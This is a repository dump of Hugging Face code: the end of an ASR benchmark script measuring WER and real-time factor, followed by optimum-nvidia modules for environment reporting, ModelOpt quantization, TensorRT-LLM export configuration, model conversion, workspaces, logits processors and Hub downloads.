+ dataset = dataset.map(benchmark, batch_size=args.batch_size, batched=True, remove_columns=['audio'])
854
+ all_results = {'audio_length_s': [], 'transcription_time_s': [], 'predictions': [], 'references': []}
855
+ result_iter = iter(dataset)
856
+ for result in tqdm(result_iter, desc='Samples...'):
857
+ for key in all_results:
858
+ all_results[key].append(result[key])
859
+ manifest_path = data_utils.write_manifest(all_results['references'], all_results['predictions'], args.model_id, args.dataset_path, args.dataset, args.split, audio_length=all_results['audio_length_s'], transcription_time=all_results['transcription_time_s'])
860
+ print('Results saved at path:', os.path.abspath(manifest_path))
861
+ wer = wer_metric.compute(references=all_results['references'], predictions=all_results['predictions'])
862
+ wer = round(100 * wer, 2)
863
+ rtfx = round(sum(all_results['audio_length_s']) / sum(all_results['transcription_time_s']), 2)
864
+ print('WER:', wer, '%', 'RTFx:', rtfx)
865
+ if __name__ == '__main__':
866
+ parser = argparse.ArgumentParser()
867
+ parser.add_argument('--model_id', type=str, required=True, help='Model identifier. Should be loadable with 🤗 Transformers')
868
+ parser.add_argument('--dataset_path', type=str, default='esb/datasets', help='Dataset path. By default, it is `esb/datasets`')
869
+ parser.add_argument('--dataset', type=str, required=True, help="Dataset name. *E.g.* `librispeech_asr` for the LibriSpeech ASR dataset, or `common_voice` for Common Voice. The full list of dataset names can be found at `https://huggingface.co/datasets/esb/datasets`")
870
+ parser.add_argument('--split', type=str, default='test', help="Split of the dataset. *E.g.* `validation` for the dev split, or `test` for the test split.")
871
+ parser.add_argument('--device', type=int, default=-1, help='The device to run the pipeline on. -1 for CPU (default), 0 for the first GPU and so on.')
872
+ parser.add_argument('--batch_size', type=int, default=16, help='Number of samples to go through each streamed batch.')
873
+ parser.add_argument('--max_eval_samples', type=int, default=None, help='Number of samples to be evaluated. Put a lower number e.g. 64 for testing this script.')
874
+ parser.add_argument('--no-streaming', dest='streaming', action='store_false', help="Choose whether you'd like to download the entire dataset or stream it during the evaluation.")
875
+ parser.add_argument('--max_new_tokens', type=int, default=None, help='Maximum number of tokens to generate (for auto-regressive models).')
876
+ parser.add_argument('--torch_compile', action='store_true', help='Whether to JIT compile the forward pass of the model.')
877
+ parser.add_argument('--compile_mode', type=str, default='max-autotune', help="Mode for torch compiling model forward pass. Can be either 'default', 'reduce-overhead', 'max-autotune' or 'max-autotune-no-cudagraphs'.")
878
+ parser.add_argument('--warmup_steps', type=int, default=10, help='Number of warm-up steps to run before launching the timed runs.')
879
+ args = parser.parse_args()
880
+ parser.set_defaults(streaming=False)
881
+ main(args)
882
+
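One detail of the script above worth calling out is the model-class dispatch at the top of main(): encoder-decoder checkpoints such as Whisper are loaded with AutoModelForSpeechSeq2Seq, while anything else falls back to AutoModelForCTC. The same check can be reproduced standalone (the checkpoint id is illustrative):

    from transformers import (
        AutoConfig, AutoModelForCTC, AutoModelForSpeechSeq2Seq,
        MODEL_FOR_SPEECH_SEQ_2_SEQ_MAPPING,
    )

    config = AutoConfig.from_pretrained("openai/whisper-tiny.en")  # illustrative checkpoint
    is_seq2seq = type(config) in MODEL_FOR_SPEECH_SEQ_2_SEQ_MAPPING
    cls_model = AutoModelForSpeechSeq2Seq if is_seq2seq else AutoModelForCTC
    print(cls_model.__name__)  # seq2seq class for Whisper-style configs, CTC class otherwise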
huggingface_optimum-benchmark.txt ADDED
The diff for this file is too large to render. See raw diff
 
huggingface_optimum-nvidia.txt ADDED
@@ -0,0 +1,1270 @@
1
+ # File: optimum-nvidia-main/src/optimum/commands/env.py
2
+ import platform
3
+ import subprocess
4
+ import huggingface_hub
5
+ from tensorrt import __version__ as trt_version
6
+ from tensorrt_llm import __version__ as trtllm_version
7
+ from transformers import __version__ as transformers_version
8
+ from transformers.utils import is_torch_available
9
+ from optimum.commands import BaseOptimumCLICommand, CommandInfo
10
+ from optimum.version import __version__ as optimum_version
11
+
12
+ class EnvironmentCommand(BaseOptimumCLICommand):
13
+ COMMAND = CommandInfo(name='env', help='Get information about the environment used.')
14
+
15
+ @staticmethod
16
+ def print_apt_pkgs():
17
+ apt = subprocess.Popen(['apt', 'list', '--installed'], stdout=subprocess.PIPE)
18
+ grep = subprocess.Popen(['grep', 'cuda'], stdin=apt.stdout, stdout=subprocess.PIPE)
19
+ pkgs_list = list(grep.stdout)
20
+ for pkg in pkgs_list:
21
+ print(pkg.decode('utf-8').split('\n')[0])
22
+
23
+ def run(self):
24
+ pt_version = 'not installed'
25
+ if is_torch_available():
26
+ import torch
27
+ pt_version = torch.__version__
28
+ platform_info = {'Platform': platform.platform(), 'Python version': platform.python_version()}
29
+ info = {'`tensorrt` version': trt_version, '`tensorrt-llm` version': trtllm_version, '`optimum` version': optimum_version, '`transformers` version': transformers_version, '`huggingface_hub` version': huggingface_hub.__version__, '`torch` version': f'{pt_version}'}
30
+ print('\nCopy-and-paste the text below in your GitHub issue:\n')
31
+ print('\nPlatform:\n')
32
+ print(self.format_dict(platform_info))
33
+ print('\nPython packages:\n')
34
+ print(self.format_dict(info))
35
+ print('\nCUDA system packages:\n')
36
+ self.print_apt_pkgs()
37
+
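Because the command is registered through CommandInfo(name='env'), the report can be produced from the optimum CLI without writing any Python. A hedged sketch, assuming optimum-nvidia and its CLI entry point are installed in the current environment:

    import subprocess

    # Prints platform details, package versions and installed CUDA apt packages,
    # formatted for pasting into a GitHub issue.
    subprocess.run(["optimum-cli", "env"], check=True)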
38
+ # File: optimum-nvidia-main/src/optimum/nvidia/compression/modelopt.py
39
+ from abc import ABC, abstractmethod
40
+ from typing import TYPE_CHECKING, Iterable, Optional, Protocol, Union, runtime_checkable
41
+ import modelopt.torch.quantization as mtq
42
+ import modelopt.torch.sparsity as mts
43
+ import torch
44
+ from modelopt.torch.export import export_tensorrt_llm_checkpoint
45
+ from transformers.quantizers import HfQuantizer
46
+ from transformers.utils.quantization_config import QuantizationConfigMixin
47
+ from optimum.nvidia.compression import CompressionRecipe
48
+ if TYPE_CHECKING:
49
+ from modelopt.torch.quantization import QuantizeConfig
50
+ from transformers import PreTrainedModel as TransformersPreTrainedModel
51
+ from optimum.nvidia.export import Workspace
52
+
53
+ @runtime_checkable
54
+ class IntoModelOptQuantizeConfig(Protocol):
55
+
56
+ def into_modelopt_qconfig(self) -> 'QuantizeConfig':
57
+ ...
58
+
59
+ class ModelOptConfig(QuantizationConfigMixin):
60
+
61
+ def __init__(self, qconfig: Union['QuantizeConfig', 'IntoModelOptQuantizeConfig'], sparsity: Optional[Union[mts.mode.SparseGPTConfig, mts.mode.SparseMagnitudeConfig]]=None):
62
+ self._qconfig = qconfig.into_modelopt_qconfig() if isinstance(qconfig, IntoModelOptQuantizeConfig) else qconfig
63
+ self._sparsity = sparsity
64
+
65
+ @property
66
+ def quant_method(self):
67
+ return self._qconfig.algorithm
68
+
69
+ @property
70
+ def qconfig(self) -> 'QuantizeConfig':
71
+ return self._qconfig
72
+
73
+ @property
74
+ def sparsity(self) -> Optional[str]:
75
+ return self._sparsity
76
+
77
+ class ModelOptRecipe(CompressionRecipe[ModelOptConfig], ABC):
78
+
79
+ @property
80
+ @abstractmethod
81
+ def config(self) -> ModelOptConfig:
82
+ raise NotImplementedError()
83
+
84
+ @property
85
+ @abstractmethod
86
+ def dataset(self) -> Iterable:
87
+ raise NotImplementedError()
88
+
89
+ class ModelOptQuantizer(HfQuantizer):
90
+
91
+ def __init__(self, recipe: ModelOptRecipe):
92
+ super().__init__(recipe.config)
93
+ self._recipe = recipe
94
+
95
+ def _looper(self, model: 'TransformersPreTrainedModel'):
96
+ for sample in self._recipe.dataset:
97
+ _ = model(**sample)
98
+
99
+ def _process_model_before_weight_loading(self, model, **kwargs):
100
+ return model
101
+
102
+ def _process_model_after_weight_loading(self, model, **kwargs):
103
+ if 'workspace' not in kwargs:
104
+ raise KeyError('workspace not provided but required to generate quantized model representation')
105
+ workspace: 'Workspace' = kwargs.pop('workspace')
106
+ with torch.inference_mode():
107
+ if (sconfig := self._recipe.config.sparsity):
108
+ device = model.device
109
+ model = mts.sparsify(model.cpu(), sconfig, {'data_loader': self._recipe.dataset, 'collect_func': lambda x: x})
110
+ model = mts.export(model)
111
+ model.to(device)
112
+ qmodel = mtq.quantize(model, vars(self._recipe.config.qconfig), forward_loop=self._looper)
113
+ export_tensorrt_llm_checkpoint(qmodel, decoder_type=model.config.model_type, dtype=model.dtype, export_dir=workspace.checkpoints_path, inference_tensor_parallel=1, inference_pipeline_parallel=1, use_nfs_workspace=False, naive_fp8_quantization=False)
114
+ return qmodel
115
+
116
+ @property
117
+ def is_serializable(self):
118
+ return True
119
+
120
+ @property
121
+ def is_trainable(self):
122
+ return True
123
+
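ModelOptRecipe is the extension point of this module: a concrete recipe pairs a ModelOpt quantization config with the calibration batches iterated by _looper(). A hedged sketch of such a subclass; the qconfig object and calibration batches are supplied by the caller and nothing below is taken from the file above:

    from optimum.nvidia.compression.modelopt import ModelOptConfig, ModelOptRecipe

    class CalibrationRecipe(ModelOptRecipe):
        def __init__(self, qconfig, calibration_batches):
            # qconfig: a modelopt QuantizeConfig (or any object exposing into_modelopt_qconfig())
            # calibration_batches: iterable of kwargs dicts, each consumed as model(**sample)
            self._config = ModelOptConfig(qconfig)
            self._batches = calibration_batches

        @property
        def config(self) -> ModelOptConfig:
            return self._config

        @property
        def dataset(self):
            return self._batches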
124
+ # File: optimum-nvidia-main/src/optimum/nvidia/errors.py
125
+ from typing import Optional
126
+ from optimum.nvidia.utils.nvml import SM_FP8_SUPPORTED
127
+
128
+ class OptimumNvidiaException(Exception):
129
+
130
+ def __init__(self, msg: str, operation: Optional[str]=None):
131
+ if operation:
132
+ super().__init__(f'[{operation}] {msg}.')
133
+ else:
134
+ super().__init__(f'{msg}')
135
+
136
+ class UnsupportedModelException(OptimumNvidiaException):
137
+
138
+ def __init__(self, model_type: str):
139
+ super().__init__(f'Model of type {model_type} is not supported. Please open an issue at https://github.com/huggingface/optimum-nvidia/issues')
140
+
141
+ class UnsupportedHardwareFeature(OptimumNvidiaException):
142
+
143
+ def __init__(self, msg, feature: str):
144
+ super().__init__(msg, feature)
145
+
146
+ @classmethod
147
+ def float8(cls) -> 'UnsupportedHardwareFeature':
148
+ return Float8NotSupported()
149
+
150
+ class Float8NotSupported(UnsupportedHardwareFeature):
151
+
152
+ def __init__(self):
153
+ super().__init__(f'float8 is not supported on your device. Please use a device with compute capabilities {SM_FP8_SUPPORTED}', 'float8')
154
+
155
+ # File: optimum-nvidia-main/src/optimum/nvidia/export/cli.py
156
+ from typing import TYPE_CHECKING
157
+ if TYPE_CHECKING:
158
+ from argparse import ArgumentParser
159
+
160
+ def common_trtllm_export_args(parser: 'ArgumentParser'):
161
+ parser.add_argument('model', type=str, help='Model to export.')
162
+ required_group = parser.add_argument_group('Required arguments')
163
+ required_group.add_argument('--max-input-length', type=int, default=-1, help='Maximum sequence length, in number of tokens, the prompt can be. The maximum number of potential tokens generated will be <max-output-length> - <max-input-length>.')
164
+ required_group.add_argument('--max-output-length', type=int, default=-1, help='Maximum sequence length, in number of tokens, the model supports.')
165
+ optional_group = parser.add_argument_group('Optional arguments')
166
+ optional_group.add_argument('-d', '--dtype', type=str, default='auto', help="Computational data type used for the model. Defaults to 'auto', matching the model's data type.")
167
+ optional_group.add_argument('--max-batch-size', type=int, default=1, help='Maximum number of concurrent requests the model can process. Defaults to 1.')
168
+ optional_group.add_argument('--max-beams-width', type=int, default=1, help='Maximum number of sampling paths ("beams") to evaluate when decoding a new token. Defaults to 1.')
169
+ optional_group.add_argument('-q', '--quantization', type=str, help='Path to a quantization recipe file.')
170
+ optional_group.add_argument('--destination', type=str, default=None, help='Folder where the resulting exported engines will be stored. Defaults to the Hugging Face Hub cache.')
171
+ optional_group.add_argument('--push-to-hub', type=str, help='Repository to push generated engines to.')
172
+
173
+ # File: optimum-nvidia-main/src/optimum/nvidia/export/config.py
174
+ from dataclasses import dataclass
175
+ from logging import getLogger
176
+ from os import PathLike
177
+ from typing import TYPE_CHECKING, Optional, Union
178
+ from warnings import warn
179
+ from tensorrt_llm import BuildConfig
180
+ from tensorrt_llm import Mapping as ShardingInfo
181
+ from tensorrt_llm.bindings import QuantMode
182
+ from tensorrt_llm.plugin import PluginConfig
183
+ from tensorrt_llm.plugin.plugin import ContextFMHAType
184
+ from transformers import AutoConfig
185
+ from optimum.nvidia.lang import DataType
186
+ from optimum.utils import NormalizedConfig
187
+ if TYPE_CHECKING:
188
+ from transformers import PretrainedConfig
189
+ INFER_NUM_LOCAL_GPUS = -1
190
+ LOGGER = getLogger()
191
+
192
+ @dataclass
193
+ class ExportConfig:
194
+ dtype: str
195
+ max_input_len: int
196
+ max_output_len: int
197
+ max_batch_size: int
198
+ max_beam_width: int = 1
199
+ max_num_tokens: int = -1
200
+ enabled_chunked_context: int = False
201
+ sharding: Optional[ShardingInfo] = None
202
+ optimization_level: int = 3
203
+
204
+ def __post_init__(self):
205
+ if self.max_batch_size < 1:
206
+ raise ValueError(f'max_batch_size should be >= 1, got {self.max_batch_size}')
207
+
208
+ @staticmethod
209
+ def from_pretrained(model_id_or_path: Union[str, PathLike], max_batch_size: int=1) -> 'ExportConfig':
210
+ return ExportConfig.from_config(AutoConfig.from_pretrained(model_id_or_path), max_batch_size)
211
+
212
+ @staticmethod
213
+ def from_config(config: Union[NormalizedConfig, 'PretrainedConfig'], max_batch_size: int=1) -> 'ExportConfig':
214
+ if not isinstance(config, NormalizedConfig):
215
+ config = NormalizedConfig(config)
216
+ dtype = DataType.from_torch(config.torch_dtype).value
217
+ max_input_len = config.max_position_embeddings
218
+ max_output_len = config.max_position_embeddings
219
+ econfig = ExportConfig(dtype=dtype, max_input_len=max_input_len, max_output_len=max_output_len, max_batch_size=max_batch_size)
220
+ econfig.with_sharding()
221
+ econfig.validate()
222
+ return econfig
223
+
224
+ def validate(self) -> 'ExportConfig':
225
+ if self.optimization_level < 0:
226
+ raise ValueError(f'optimization_level should be >= 0, got {self.optimization_level}')
227
+ if self.max_num_tokens == -1:
228
+ if self.enabled_chunked_context:
229
+ self.max_num_tokens = 128
230
+ warn(f'max_num_tokens set to {self.max_num_tokens} with chunked context enabled might not be optimal.')
231
+ else:
232
+ self.max_num_tokens = 2 * self.max_input_len
233
+ LOGGER.debug(f'Inferred max_num_tokens={self.max_num_tokens}')
234
+ return self
235
+
236
+ @property
237
+ def plugin_config(self) -> 'PluginConfig':
238
+ config = PluginConfig()
239
+ config.gemm_plugin = 'auto'
240
+ config.gpt_attention_plugin = 'auto'
241
+ config.set_context_fmha(ContextFMHAType.enabled)
242
+ if self.sharding.world_size > 1:
243
+ config.lookup_plugin = 'auto'
244
+ config.set_nccl_plugin()
245
+ if DataType(self.dtype) == DataType.FLOAT8:
246
+ config.gemm_swiglu_plugin = True
247
+ return config
248
+
249
+ def to_builder_config(self, qmode: Optional['QuantMode']=None, plugin_config: Optional[PluginConfig]=None) -> 'BuildConfig':
250
+ self.validate()
251
+ plugin_config = plugin_config or self.plugin_config
252
+ if qmode:
253
+ plugin_config.use_fp8_context_fmha = qmode.has_fp8_qdq() or qmode.has_fp8_kv_cache()
254
+ if qmode.is_weight_only():
255
+ plugin_config.weight_only_groupwise_quant_matmul_plugin = 'auto'
256
+ weight_sparsity = False
257
+ else:
258
+ weight_sparsity = False
259
+ return BuildConfig(max_input_len=self.max_input_len, max_seq_len=self.max_output_len, max_batch_size=self.max_batch_size, max_beam_width=self.max_beam_width, max_num_tokens=self.max_num_tokens, builder_opt=self.optimization_level, plugin_config=plugin_config, use_fused_mlp=True, weight_sparsity=weight_sparsity)
260
+
261
+ def with_sharding(self, tp: int=1, pp: int=1, gpus_per_node: int=8, sharding: Optional[ShardingInfo]=None) -> 'ExportConfig':
262
+ self.sharding = sharding or ShardingInfo(tp_size=tp, pp_size=pp, world_size=tp * pp, gpus_per_node=gpus_per_node)
263
+ return self
264
+
265
+ def auto_parallel(config: 'ExportConfig', world_size: int=INFER_NUM_LOCAL_GPUS) -> 'ExportConfig':
266
+ if world_size < 1:
267
+ from optimum.nvidia.utils.nvml import get_device_count
268
+ world_size = get_device_count()
269
+ LOGGER.info(f'Found {world_size} GPUs on the system')
270
+ if world_size == 0:
271
+ raise ValueError('No GPU found')
272
+ elif world_size == 1:
273
+ return config.with_sharding(tp=1, pp=1, gpus_per_node=world_size)
274
+ else:
275
+ LOGGER.info(f'Creating auto-parallelization strategy on {world_size}-GPUs')
276
+ LOGGER.warning('Auto-parallelization strategy is currently in beta and might not be optimal')
277
+ if world_size == 2:
278
+ return config.with_sharding(tp=2, pp=1, gpus_per_node=world_size)
279
+ elif world_size == 4:
280
+ return config.with_sharding(tp=2, pp=2, gpus_per_node=world_size)
281
+ elif world_size == 8:
282
+ return config.with_sharding(tp=4, pp=2, gpus_per_node=world_size)
283
+ else:
284
+ raise ValueError(f'Unsupported number of GPUs: {world_size}. Please open an issue on the optimum-nvidia repository: https://github.com/huggingface/optimum-nvidia')
285
+
286
+ def sharded(config: 'ExportConfig', tp: int=1, pp: int=1) -> 'ExportConfig':
287
+ if tp < 1:
288
+ raise ValueError(f'Tensor Parallelism (tp) should be >= 1 (got: tp={tp})')
289
+ if pp < 1:
290
+ raise ValueError(f'Pipeline Parallelism (pp) should be >= 1 (got: pp={pp})')
291
+ return config.with_sharding(sharding=ShardingInfo(tp_size=tp, pp_size=pp, world_size=tp * pp))
292
+
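The free functions above compose with the dataclass: from_pretrained() seeds the dtype and sequence lengths from the Hugging Face config, sharded() or auto_parallel() fill in the Mapping, and to_builder_config() turns the result into a tensorrt_llm.BuildConfig. A short sketch (the checkpoint id is illustrative):

    from optimum.nvidia.export.config import ExportConfig, sharded

    export_config = ExportConfig.from_pretrained("meta-llama/Llama-2-7b-chat-hf", max_batch_size=8)
    export_config = sharded(export_config, tp=2, pp=1)  # 2-way tensor parallelism
    build_config = export_config.to_builder_config()    # tensorrt_llm.BuildConfig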
293
+ # File: optimum-nvidia-main/src/optimum/nvidia/export/converter.py
294
+ import shutil
295
+ from abc import ABC
296
+ from enum import Enum
297
+ from logging import getLogger
298
+ from os import PathLike
299
+ from pathlib import Path
300
+ from typing import TYPE_CHECKING, Optional, Sequence, Type, Union
301
+ from tensorrt_llm.builder import build
302
+ from optimum.nvidia.compression.modelopt import ModelOptQuantizer
303
+ from optimum.nvidia.export import Workspace
304
+ from optimum.nvidia.utils.nvml import get_device_name, is_post_ampere
305
+ if TYPE_CHECKING:
306
+ from tensorrt_llm import BuildConfig, Mapping
307
+ from tensorrt_llm.models import PretrainedModel
308
+ from transformers import PreTrainedModel as TransformersPreTrainedModel
309
+ from optimum.nvidia.compression.modelopt import ModelOptRecipe
310
+ LOGGER = getLogger()
311
+
312
+ def infer_plugin_from_build_config(config: 'BuildConfig') -> 'BuildConfig':
313
+ if is_post_ampere():
314
+ LOGGER.debug('Enabling Paged Context FMHA plugin')
315
+ config.plugin_config.update_from_dict({'use_paged_context_fmha': True})
316
+ config.plugin_config.update_from_dict({'enable_xqa': False})
317
+ return config
318
+
319
+ class TensorRTArtifactKind(Enum):
320
+ CHECKPOINTS = 'checkpoints'
321
+ ENGINES = 'engines'
322
+
323
+ class TensorRTArtifact:
324
+
325
+ @staticmethod
326
+ def checkpoints(root: Union[str, PathLike]) -> 'TensorRTArtifact':
327
+ return TensorRTArtifact(TensorRTArtifactKind.CHECKPOINTS, root)
328
+
329
+ @staticmethod
330
+ def engines(root: Union[str, PathLike]) -> 'TensorRTArtifact':
331
+ return TensorRTArtifact(TensorRTArtifactKind.ENGINES, root)
332
+
333
+ def __init__(self, kind: TensorRTArtifactKind, root: Union[str, PathLike]):
334
+ self._kind = kind
335
+ self._root = root
336
+
337
+ @property
338
+ def kind(self) -> TensorRTArtifactKind:
339
+ return self._kind
340
+
341
+ @property
342
+ def root(self) -> Path:
343
+ return Path(self._root)
344
+
345
+ def push_to_hub(self):
346
+ raise NotImplementedError()
347
+
348
+ class TensorRTModelConverter(ABC):
349
+ CONFIG_CLASS: Type
350
+ MODEL_CLASS: Type
351
+
352
+ def __init__(self, model_id: str, subpart: str='', workspace: Optional[Union['Workspace', str, bytes, Path]]=None, license_path: Optional[Union[str, bytes, Path]]=None):
353
+ LOGGER.info(f'Creating a model converter for {subpart}')
354
+ if not workspace:
355
+ target_device = get_device_name(0)[-1]
356
+ workspace = Workspace.from_hub_cache(model_id, target_device, subpart=subpart)
357
+ if isinstance(workspace, (str, bytes, Path)):
358
+ workspace = Workspace(Path(workspace))
359
+ LOGGER.debug(f'Initializing model converter workspace at {workspace.root}')
360
+ self._workspace = workspace
361
+ self._license_path = license_path
362
+
363
+ @property
364
+ def workspace(self) -> Workspace:
365
+ return self._workspace
366
+
367
+ def save_license(self, licence_filename: str='LICENSE'):
368
+ if not (dst_licence_file_path := (self.workspace.root / licence_filename)).exists() and self._license_path:
369
+ shutil.copyfile(self._license_path, dst_licence_file_path)
370
+
371
+ def quantize(self, model: 'TransformersPreTrainedModel', qconfig: 'ModelOptRecipe') -> TensorRTArtifact:
372
+ quantizer = ModelOptQuantizer(qconfig)
373
+ quantizer.preprocess_model(model, workspace=self.workspace)
374
+ quantizer.postprocess_model(model, workspace=self.workspace)
375
+ self.save_license()
376
+ return TensorRTArtifact.checkpoints(self._workspace.checkpoints_path)
377
+
378
+ def convert(self, models: Union['PretrainedModel', Sequence['PretrainedModel']], mapping: Optional['Mapping']=None) -> TensorRTArtifact:
379
+ if isinstance(models, PretrainedModel):
380
+ models = [models]
381
+ for (rank, model) in enumerate(models):
382
+ LOGGER.info(f'Converting {models[0].config.architecture} model for rank {rank} to TRTLLM')
383
+ model.save_checkpoint(str(self._workspace.checkpoints_path))
384
+ self.save_license()
385
+ return TensorRTArtifact.checkpoints(str(self._workspace.checkpoints_path))
386
+
387
+ def build(self, models: Union['PretrainedModel', Sequence['PretrainedModel']], config: 'BuildConfig') -> TensorRTArtifact:
388
+ if not isinstance(models, Sequence):
389
+ models = [models]
390
+ config = infer_plugin_from_build_config(config)
391
+ for model in models:
392
+ LOGGER.info(f'Building TRTLLM engine for rank {model.config.mapping.rank} ->> {config.to_dict()}')
393
+ engine = build(model, config)
394
+ engine.save(str(self._workspace.engines_path))
395
+ self.save_license()
396
+ return TensorRTArtifact.engines(str(self._workspace.engines_path))
397
+
398
+ # File: optimum-nvidia-main/src/optimum/nvidia/export/workspace.py
399
+ from dataclasses import dataclass
400
+ from pathlib import Path
401
+ from typing import Iterable, Optional
402
+ from huggingface_hub import cached_assets_path
403
+ from tensorrt_llm import __version__ as TRTLLM_VERSION
404
+ from optimum.nvidia import LIBRARY_NAME
405
+ from optimum.nvidia.export import PATH_FILE_CHECKPOINTS, PATH_FILE_ENGINES, PATH_FOLDER_CHECKPOINTS, PATH_FOLDER_ENGINES
406
+
407
+ @dataclass
408
+ class Workspace:
409
+ root: Path
410
+
411
+ @staticmethod
412
+ def from_hub_cache(model_id: str, device: str, namespace: str=LIBRARY_NAME, version: str=TRTLLM_VERSION, subpart: Optional[str]=None) -> 'Workspace':
413
+ assets_path = cached_assets_path(namespace, namespace=version, subfolder=model_id)
414
+ assets_path = assets_path.joinpath(device)
415
+ if subpart:
416
+ assets_path = assets_path.joinpath(subpart)
417
+ assets_path.mkdir(exist_ok=True, parents=True)
418
+ return Workspace(assets_path)
419
+
420
+ def __post_init__(self):
421
+ if not self.checkpoints_path.exists():
422
+ self.checkpoints_path.mkdir(parents=True)
423
+ if not self.engines_path.exists():
424
+ self.engines_path.mkdir(parents=True)
425
+
426
+ @property
427
+ def checkpoints_path(self) -> Path:
428
+ return self.root / PATH_FOLDER_CHECKPOINTS
429
+
430
+ @property
431
+ def engines_path(self) -> Path:
432
+ return self.root / PATH_FOLDER_ENGINES
433
+
434
+ @property
435
+ def checkpoints(self) -> Iterable[Path]:
436
+ return self.checkpoints_path.glob(PATH_FILE_CHECKPOINTS)
437
+
438
+ def engines(self) -> Iterable[Path]:
439
+ return self.engines_path.glob(PATH_FILE_ENGINES)
440
+
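Workspace.from_hub_cache() keys the cached artifacts by library name, TensorRT-LLM version, model id and target device, so repeated exports of the same model on the same GPU reuse a single folder. A small sketch (the model id and device string are illustrative):

    from optimum.nvidia.export.workspace import Workspace

    ws = Workspace.from_hub_cache("meta-llama/Llama-2-7b-chat-hf", device="a100", subpart="decoder")
    print(ws.checkpoints_path)  # checkpoint subfolder, created by __post_init__ if missing
    print(ws.engines_path)      # engine subfolder next to it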
441
+ # File: optimum-nvidia-main/src/optimum/nvidia/generation/logits_process.py
442
+ import torch
443
+ from transformers import ForceTokensLogitsProcessor, SuppressTokensAtBeginLogitsProcessor, SuppressTokensLogitsProcessor
444
+ from transformers.generation.logits_process import WhisperNoSpeechDetection
445
+
446
+ class TrtSuppressTokensLogitsProcessor(SuppressTokensLogitsProcessor):
447
+
448
+ def __call__(self, step: int, input_ids: torch.Tensor, scores: torch.Tensor):
449
+ scores = super().__call__(input_ids, scores)
450
+ return scores
451
+
452
+ class TrtSuppressTokensAtBeginLogitsProcessor(SuppressTokensAtBeginLogitsProcessor):
453
+
454
+ def __call__(self, step: int, input_ids: torch.Tensor, scores: torch.Tensor):
455
+ scores = super().__call__(input_ids, scores)
456
+ return scores
457
+
458
+ class TrtForceTokensLogitsProcessor(ForceTokensLogitsProcessor):
459
+
460
+ def __call__(self, step: int, input_ids: torch.Tensor, scores: torch.Tensor):
461
+ scores = super().__call__(input_ids, scores)
462
+ return scores
463
+
464
+ class TrtWhisperNoSpeechDetection(WhisperNoSpeechDetection):
465
+
466
+ def __call__(self, step: int, input_ids: torch.Tensor, scores: torch.Tensor):
467
+ scores = super().__call__(input_ids, scores)
468
+ return scores
469
+ LOGITS_PROCESSOR_MAP = {SuppressTokensLogitsProcessor: TrtSuppressTokensLogitsProcessor, SuppressTokensAtBeginLogitsProcessor: TrtSuppressTokensAtBeginLogitsProcessor, ForceTokensLogitsProcessor: TrtForceTokensLogitsProcessor, WhisperNoSpeechDetection: TrtWhisperNoSpeechDetection}
470
+
471
+ # File: optimum-nvidia-main/src/optimum/nvidia/hub.py
472
+ import re
473
+ from abc import ABCMeta, abstractmethod
474
+ from logging import getLogger
475
+ from os import PathLike, scandir, symlink
476
+ from pathlib import Path
477
+ from shutil import copyfile, copytree
478
+ from typing import Dict, Generator, Iterable, List, Mapping, Optional, Type, Union
479
+ import torch.cuda
480
+ from huggingface_hub import ModelHubMixin, snapshot_download
481
+ from huggingface_hub.hub_mixin import T
482
+ from tensorrt_llm import __version__ as trtllm_version
483
+ from tensorrt_llm.models import PretrainedConfig
484
+ from tensorrt_llm.models import PretrainedModel as TrtLlmPreTrainedModel
485
+ from transformers import AutoConfig, GenerationConfig
486
+ from transformers import PretrainedConfig as TransformersPretraineConfig
487
+ from transformers.utils import CONFIG_NAME, GENERATION_CONFIG_NAME, SAFE_WEIGHTS_INDEX_NAME
488
+ from optimum.nvidia import LIBRARY_NAME
489
+ from optimum.nvidia.compression.modelopt import ModelOptRecipe
490
+ from optimum.nvidia.export import PATH_FOLDER_ENGINES, ExportConfig, TensorRTModelConverter, Workspace, auto_parallel
491
+ from optimum.nvidia.lang import DataType
492
+ from optimum.nvidia.models import SupportsFromHuggingFace, SupportsTransformersConversion
493
+ from optimum.nvidia.models.base import SupportFromTrtLlmCheckpoint
494
+ from optimum.nvidia.utils import get_user_agent
495
+ from optimum.nvidia.utils.nvml import get_device_count, get_device_name
496
+ from optimum.utils import NormalizedConfig
497
+ ATTR_TRTLLM_ENGINE_FOLDER = '__trtllm_engine_folder__'
498
+ FILE_TRTLLM_ENGINE_PATTERN = 'rank[0-9]*.engine'
499
+ FILE_TRTLLM_CHECKPOINT_PATTERN = 'rank[0-9]*.safetensors'
500
+ FILE_LICENSE_NAME = 'LICENSE'
501
+ HUB_SNAPSHOT_ALLOW_PATTERNS = [CONFIG_NAME, GENERATION_CONFIG_NAME, SAFE_WEIGHTS_INDEX_NAME, '*.safetensors', FILE_LICENSE_NAME]
502
+ LOGGER = getLogger()
503
+
504
+ def folder_list_engines(folder: Path) -> Iterable[Path]:
505
+ if folder.exists():
506
+ return list(folder.glob('*.engine'))
507
+ return []
508
+
509
+ def folder_list_checkpoints(folder: Path) -> Iterable[Path]:
510
+ checkpoint_candidates = []
511
+ if folder.exists():
512
+ re_checkpoint_filename = re.compile('rank[0-9]+\\.safetensors')
513
+ checkpoint_candidates = list(map(Path, filter(lambda item: re_checkpoint_filename.match(item.name), scandir(folder))))
514
+ return checkpoint_candidates
515
+
516
+ def get_rank_from_filename(filename: str) -> int:
517
+ name = filename.split('.')[0]
518
+ if name.startswith('rank'):
519
+ return int(name[3:])
520
+ else:
521
+ raise ValueError(f'Unknown filename format {filename} to extract rank from')
522
+
523
+ def get_trtllm_artifact(model_id: str, patterns: List[str], add_default_allow_patterns: bool=True) -> Path:
524
+ if (local_path := Path(model_id)).exists():
525
+ return local_path
526
+ return Path(snapshot_download(repo_id=model_id, repo_type='model', library_name=LIBRARY_NAME, library_version=trtllm_version, user_agent=get_user_agent(), allow_patterns=patterns + HUB_SNAPSHOT_ALLOW_PATTERNS if add_default_allow_patterns else patterns))
527
+
528
+ def get_trtllm_checkpoints(model_id: str, device: str, dtype: str):
529
+ if (workspace := Workspace.from_hub_cache(model_id, device)).checkpoints_path.exists():
530
+ return workspace.checkpoints_path
531
+ return get_trtllm_artifact(model_id, [f'{device}/{dtype}/**/*.safetensors'])
532
+
533
+ def get_trtllm_engines(model_id: str, device: str, dtype: str):
534
+ if (workspace := Workspace.from_hub_cache(model_id, device)).engines_path.exists():
535
+ return workspace.engines_path
536
+ return get_trtllm_artifact(model_id, [f'{device}/{dtype}/**/{PATH_FOLDER_ENGINES}/*.engine'])
537
+
538
